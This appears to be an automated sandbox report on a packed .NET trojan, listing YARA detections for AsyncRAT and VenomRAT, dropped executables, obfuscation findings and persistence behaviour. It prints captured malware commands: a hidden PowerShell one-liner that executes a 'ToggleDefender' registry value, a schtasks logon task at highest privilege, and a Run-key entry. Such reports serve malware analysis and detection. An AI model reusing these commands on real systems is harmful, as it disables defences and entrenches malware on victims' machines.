Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: Loaader.exe, 00000015.00000002.3394522285.0000000013094000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3269125954.00000000014A0000.00000004.08000000.00040000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\Ninja\Downloads\dcrat_fix-master\dcrat_fix-master\MessagePack\bin\Release\MessagePackLib.pdb source: Loaader.exe, 00000015.00000002.3552953263.000000001CB50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.polly.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: MessagePackLib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: ion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb; source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: Loader.exe, 00000014.00000002.2744918575.000000001B440000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Client.exe.0.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Binary or sample is protected by dotNetProtector

Source: Loaader.exe, 00000015.00000002.3279406643.0000000002F00000.00000004.08000000.00040000.00000000.sdmp

String found in binary or memory: dotNetProtector

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}

Yara detected Costura Assembly Loader

Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Binary contains a suspicious time stamp

Source: WinDefend.exe.0.dr

Static PE information: 0xCB2C3ED5 [Thu Jan 6 06:01:57 2078 UTC]

PE file contains sections with non-standard names

Source: WinDefend.exe.0.dr	Static PE information: section name: %q2hF6
Source: WinDefend.exe.0.dr	Static PE information: section name:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Code function: 0_2_00007FF848F200BD pushad ; iretd	0_2_00007FF848F200C1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F000BD pushad ; iretd	2_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F100BD pushad ; iretd	3_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53CF push edx; iretd	4_2_02CF53D2
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53AF push ecx; iretd	4_2_02CF53B6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53AB push ecx; iretd	4_2_02CF53AE
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16DF push cs; iretd	4_2_02CF16E6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16B3 push cs; iretd	4_2_02CF16BA
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF1641 push ss; iretd	4_2_02CF1642
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF545B push ebx; iretd	4_2_02CF5462
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF546B push edx; iretd	4_2_02CF546E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF541F push eax; iretd	4_2_02CF5426
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF25BF push ds; iretd	4_2_02CF25C6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2577 push ds; iretd	4_2_02CF2586
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F400BD pushad ; iretd	18_2_00007FF848F400C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F100BD pushad ; iretd	19_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F4792B push ebx; retf	20_2_00007FF848F4796A
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F4614A pushfd ; ret	20_2_00007FF848F46191
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F48167 push ebx; ret	20_2_00007FF848F4816A
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F46192 push edi; ret	20_2_00007FF848F461D6
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43C10 push esi; retf 5F4Ah	20_2_00007FF848F55AD7
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F47C5E push eax; retf	20_2_00007FF848F47C6D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F47BCE pushad ; retf	20_2_00007FF848F47C5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F300BD pushad ; iretd	20_2_00007FF848F300C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF849121A34 push ss; iretd	20_2_00007FF849121A38
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EEF5 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F15587 push ecx; iretd	21_2_00007FF848F155DC
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0F020 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F000BD pushad ; iretd	21_2_00007FF848F000C1
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EF70 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EF98 pushad ; retf	21_2_00007FF848F0F149

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Static PE information: section name: .text entropy: 7.992585946584666
Source: WinDefend.exe.0.dr	Static PE information: section name: %q2hF6 entropy: 7.9947379715100375

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\Client.exe	File created: C:\Users\user\AppData\Roaming\Loader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\Infected.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	File created: C:\Users\user\AppData\Roaming\Loaader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\Client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\Loader.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1 D179E1D3E1F46C85BB4A03E9C9069E8B529999E776B7B12C2D4A47F622535F8C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
